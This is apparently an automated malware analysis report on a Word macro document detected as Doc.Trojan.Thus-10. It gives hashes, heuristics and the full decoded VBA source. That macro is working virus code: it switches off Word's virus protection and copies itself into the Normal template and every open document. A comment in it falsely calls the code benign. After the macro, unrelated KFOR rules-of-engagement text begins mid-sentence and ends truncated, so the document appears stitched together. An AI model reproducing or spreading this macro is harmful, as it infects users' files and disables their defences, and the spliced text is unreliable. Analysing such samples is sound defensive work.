Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a3ca77798a18beac…

MALICIOUS

Office (OLE)

Size: 65.5 KB
Created: 2001-07-06 19:55:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: b02a37f623121b1cef0c40eda83ff6c1
SHA-1: e31b238d88c31c93ffc7e8a73ba61ef04876225b
SHA-256: a3ca77798a18beac2ff6b523866dd7fccf48623b5d23650936fa2c67e3f427d8
Risk Score: 188

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code automatically when the document is opened. The ClamAV detection 'Doc.Trojan.Thus-10' strongly suggests malicious intent. The VBA code appears to be designed to ensure its own execution and potentially download further stages, although the exact payload mechanism is obfuscated.

Heuristics (4)

  • [critical] CLAMAV_DETECTION: ClamAV: Doc.Trojan.Thus-10
    ClamAV detected this file as malware: Doc.Trojan.Thus-10
  • [medium] OLE_VBA_MACROS: VBA macros detected (1 related finding)
    Document contains VBA macro code
  • [high] OLE_VBA_DOCOPEN: Document_Open macro
    Document_Open macro
  • [low] SE_URGENCY_LURE: Urgency / deadline lure
    Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16550 bytes
SHA-256: 68c3b7764988b10c783ac3ba5cd6f16c9724695e9b8b03553ab6f5b53a962256
Detection: ClamAV: Doc.Trojan.Thus-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_001'
'Anti-Smyser'
' This virus is an alteration of a virus which was
' designed to delete all files from one's C: drive on Dec 13th.
' This code is completely benign.
    On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Anti-Smyser'" Then
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
        .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
        .CodeModule.CountOfLines
    End If
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
        .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
        .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
        .Item(1).CodeModule.CountOfLines)
    End If
    For k = 1 To Application.Documents.Count
        If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(3, 1) <> "'Anti-Smyser'" Then
            Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
            .CodeModule.DeleteLines 1, Application.Documents.Item(k) _
            .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        End If
        If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
            Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
            .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
            .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
            .VBComponents.Item(1).CodeModule.CountOfLines)
        End If
    Next k
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
Private Sub Document_New()
    Document_Open
End Sub
  is authorised.

L03 Use of minimum force to defend friendly forces and Persons with Designated Special Status (PDSS) against forces demonstrating hostile intent is authorised.

L04 Use of minimum force to prevent the taking possession of or destruction of force property is authorised.

L05 Use of minimum force to prevent the taking possession of or destruction of property with designated special status is authorised. Individual service personnel are to be informed when they are protecting specific property on this basis.

L06 Use of minimum force to defend against intrusion by hostile forces/belligerents into Assembly Areas, Military Restricted Areas or other areas designated by an Authorised Commander is authorised.

L07 Use of minimum force against any armed individuals who fail to comply with instructions issued by KFOR personnel engaged in the execution of their duties is authorised.

L08 Detention of hostile forces/belligerents who obstruct friendly forces, but only after appropriate non-forcible attempts to negate such obstruction have failed, is authorised.

L09 Detention of hostile forces/belligerents who attempt to enter controlled areas, commit assaults on friendly forces, commit or threaten to commit serious crimes against friendly forces or attack friendly force property is authorised.

L10 Detention of civilians who obstruct the progress of friendly forces whether by demonstration, riot, or other means is authorised.

L11 Detention of civilians who enter or attempt to enter, without authority, any area controlled by friendly forces is authorised.

L12 Detention of civilians who commit any assault upon any member of friendl
... (truncated)